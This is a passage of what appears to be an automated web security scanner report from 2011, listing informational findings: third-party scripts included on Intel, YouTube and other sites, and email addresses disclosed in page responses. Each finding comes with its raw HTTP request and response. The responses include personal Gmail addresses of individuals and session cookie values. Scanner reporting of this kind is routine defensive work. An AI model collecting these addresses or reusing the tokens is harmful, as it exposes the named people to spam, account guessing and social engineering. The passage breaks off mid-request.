INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47688

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<!-- wf - Crazyegg Heatmap -->
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/3310.js"></script>
...[SNIP]...

18.120. http://www.ipdps.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ipdps.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.ipdps.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:42 GMT
Server: Rapidsite/Apa/1.3.33 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.22 OpenSSL/0.9.8d
Last-Modified: Fri, 04 Feb 2011 18:23:29 GMT
ETag: "780888d-39cf-4d4c4421"
Accept-Ranges: bytes
Content-Length: 14799
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/2011.dwt" codeOutsideHTMLIsLocked="false" -->
<head
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

18.121. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bu17mduk7is8kedhijahsmb432; expires=Tue, 01-Mar-2011 02:50:35 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 05 Feb 2011 23:16:15 GMT
ETag: "5bc4ba8773ce80095954738aa6226440"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.122. http://www.youtube.com/view_play_list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /view_play_list

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s.ytimg.com/yt/jsbin/www-browse-vflF9ViWz.js
  • http://s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js

Request

GET /view_play_list?p=698CFFD6A87A1ACB HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: sWkFSZzctYUFHdmlOMGhxMlFMMVN5MW1IdjdOMHczMERDcUtzQ0hPZ0FtVGp3eHVCM3hwUEFB -->
<head>


<title>
YouTube
- Broadcast Yourself.

...[SNIP]...
<div id="postpage">

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-browse-vflF9ViWz.js"></script>
...[SNIP]...

19. Email addresses disclosed  previous  next
There are 52 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. http://blogs.intel.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5205 t=1296947781468896
Connection: close
Content-Length: 42181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.2. http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:18 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=7024 t=1296947778767507
Vary: Accept-Encoding
Connection: close
Content-Length: 34050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.3. http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5699 t=1296947777549940
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.4. http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/12/why_non-techies_should_consider_intel.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2010/12/why_non-techies_should_consider_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=10275 t=1296947777188938
Connection: close
Content-Length: 35786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.5. http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=4760 t=1296947779216933
Vary: Accept-Encoding
Connection: close
Content-Length: 36265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.6. http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/top_ten_reasons_i_work_for_intel.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2011/01/top_ten_reasons_i_work_for_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5263 t=1296947779269283
Connection: close
Content-Length: 41979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.7. http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/you_want_me_to_move_where.php

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/2011/01/you_want_me_to_move_where.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=4500 t=1296947778837871
Connection: close
Content-Length: 33718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.8. http://blogs.intel.com/jobs/about-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/about-us/

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/about-us/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=6041 t=1296947782477121
Connection: close
Content-Length: 64858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.9. http://blogs.intel.com/jobs/just-for-students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/just-for-students/

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/just-for-students/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=7672 t=1296947782408018
Vary: Accept-Encoding
Connection: close
Content-Length: 88344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.10. http://blogs.intel.com/jobs/life-at-intel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/life-at-intel/

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/life-at-intel/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5613 t=1296947779536465
Connection: close
Content-Length: 72711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.11. http://blogs.intel.com/jobs/your-future/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/your-future/

Issue detail

The following email address was disclosed in the response:
  • JobsBlog@intel.com

Request

GET /jobs/your-future/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=4807 t=1296947779399903
Connection: close
Content-Length: 38135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<a href="mailto:JobsBlog@intel.com">
...[SNIP]...

19.12. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following email address was disclosed in the response:
  • TenSafeF...@gmail.com

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

19.13. http://communities.intel.com/community/openportit/vproexpert  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The following email address was disclosed in the response:
  • blair.muller@gmail.com

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
com"
id="jive-876866,104,821,471,841,526"
onmouseover="quickuserprofile.getUserProfileTooltip(87686);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>blair.muller@gmail.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/blair.muller%40gmail.com/avatar/22.png?a=-1"
border="0" height="22" width="22"
alt="blair.muller@gmail.com"
/>
...[SNIP]...
com"
id="jive-876866,104,821,493,596,526"
onmouseover="quickuserprofile.getUserProfileTooltip(87686);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>blair.muller@gmail.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/blair.muller%40gmail.com/avatar/22.png?a=-1"
border="0" height="22" width="22"
alt="blair.muller@gmail.com"
/>
...[SNIP]...
com"
id="jive-876866,104,821,496,152,526"
onmouseover="quickuserprofile.getUserProfileTooltip(87686);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>blair.muller@gmail.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/blair.muller%40gmail.com/avatar/22.png?a=-1"
border="0" height="22" width="22"
alt="blair.muller@gmail.com"
/>
...[SNIP]...
com"
id="jive-876866,104,821,500,663,526"
onmouseover="quickuserprofile.getUserProfileTooltip(87686);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>blair.muller@gmail.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/blair.muller%40gmail.com/avatar/22.png?a=-1"
border="0" height="22" width="22"
alt="blair.muller@gmail.com"
/>
...[SNIP]...

19.14. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /2007/10/jquerylocalscroll-10.html

Issue detail

The following email address was disclosed in the response:
  • neonspice@gmail.com

Request

GET /2007/10/jquerylocalscroll-10.html HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:48 GMT
Date: Sat, 05 Feb 2011 23:17:48 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<BR/>my e-mail is neonspice@gmail.com</p>
...[SNIP]...

19.15. http://gdata.youtube.com/feeds/api/videos/ZM0ptMqNhso/related  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdata.youtube.com
Path:   /feeds/api/videos/ZM0ptMqNhso/related

Issue detail

The following email address was disclosed in the response:
  • GONNAWHISTLE@GMAIL.COM

Request

GET /feeds/api/videos/ZM0ptMqNhso/related HTTP/1.1
Host: gdata.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 200 OK
X-GData-User-Country: FR
Content-Type: application/atom+xml; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:22:52 GMT
Date: Sat, 05 Feb 2011 23:22:52 GMT
Cache-Control: private, max-age=300, no-transform
Vary: *
GData-Version: 1.0
Last-Modified: Sat, 05 Feb 2011 23:22:52 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close
Content-Length: 118452

<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:app='http://purl.org/atom/app#' xmlns:media='http://search.yahoo.com/mrss/' xmlns:openSearch='http://a9.com/-/spec
...[SNIP]...
OME PART OF OUR EXPERIENCE!! OUR FREE MP3 SOUNDCLOUD DOWNLOAD TO OUR DEBUT SONG "HOME- EDWARD SHARPE AND THE MAGNETIC ZEROS ACOUSTIC COVER BY JORGE AND ALEXA NARVAEZ"!! ENJOY!!!!! snd.sc CONTACT US AT GONNAWHISTLE@GMAIL.COM Here's how this video came about. It was 11:00pm. After 9 or 10 practice runs with a mic that was off the entire time, we were so tired and bummed out! On the last try, she yawns and couldn't wait to
...[SNIP]...
OME PART OF OUR EXPERIENCE!! OUR FREE MP3 SOUNDCLOUD DOWNLOAD TO OUR DEBUT SONG "HOME- EDWARD SHARPE AND THE MAGNETIC ZEROS ACOUSTIC COVER BY JORGE AND ALEXA NARVAEZ"!! ENJOY!!!!! snd.sc CONTACT US AT GONNAWHISTLE@GMAIL.COM Here's how this video came about. It was 11:00pm. After 9 or 10 practice runs with a mic that was off the entire time, we were so tired and bummed out! On the last try, she yawns and couldn't wait to
...[SNIP]...

19.16. http://inside.intel.com/LOPFeedMashup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPFeedMashup

Issue detail

The following email address was disclosed in the response:
  • parallelprogrammingtalk@intel.com

Request

GET /LOPFeedMashup?ON=runMashup&SN=LOPMASHUP05&STARTINDEX=1&COUNT=10 HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers; s_lv=1296947560708; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/index.htm; s_sq=intelcorp%2Cintelcorpcim%3D%2526pid%253Dcim%25253A/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/index.htm%25253Fiid%25253Dgg_about-en_US%25252Bintel_aboutintel%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
serviceURL: http://inside.intel.com:80/presto/edge/api/rest/LOPFeedMashup/Invoke?presto_user=$session/username&presto_password=$session/password&SN%253DLOPMASHUP05%2526DT%253DCLOB%2526SIP%253D%2526STARTINDEX%253D1%2526COUNT%253D10%2526CF%253Dcached%2526ON%253DrunMashup
Content-Language: en-US
Vary: Accept-Encoding
CacheHit: D=397254 t=1296905367018642
Content-Type: text/xml;charset=UTF-8
Cache-Control: max-age=1060
Expires: Sat, 05 Feb 2011 23:29:54 GMT
Date: Sat, 05 Feb 2011 23:12:14 GMT
Connection: close
Content-Length: 44278

<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmln
...[SNIP]...
BR/&gt;Remember &amp;#8220;A thread in time can easily become nine&amp;#8221;&lt;BR/&gt;&lt;BR/&gt;as we discussed last week we are looking for interesting tags to sign off with. Submit your ideas to: parallelprogrammingtalk@intel.com&lt;BR/&gt;&lt;BR/&gt;We&amp;#8217;ll use the best and you will be famous.</content>
...[SNIP]...
read, add some synchronization&amp;#8221; and my personal favorite: &amp;#8220;Keep your powder dry and your threads safe&amp;#8221; We know there are many more and invite you to submit your ideas to: parallelprogrammingtalk@intel.com&lt;BR/&gt;&lt;BR/&gt;If we chuckle &amp;#8211; we&amp;#8217;ll use your suggestion and give you a personal shout-out.&lt;BR/&gt;&lt;BR/&gt;Tune in next week , Jan 18th at the usual time 8am for a show
...[SNIP]...

19.17. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:
  • contact@appendTo.com
  • contact@appendto.com
  • hello@filamentgroup.com

Request

GET /about HTTP/1.1
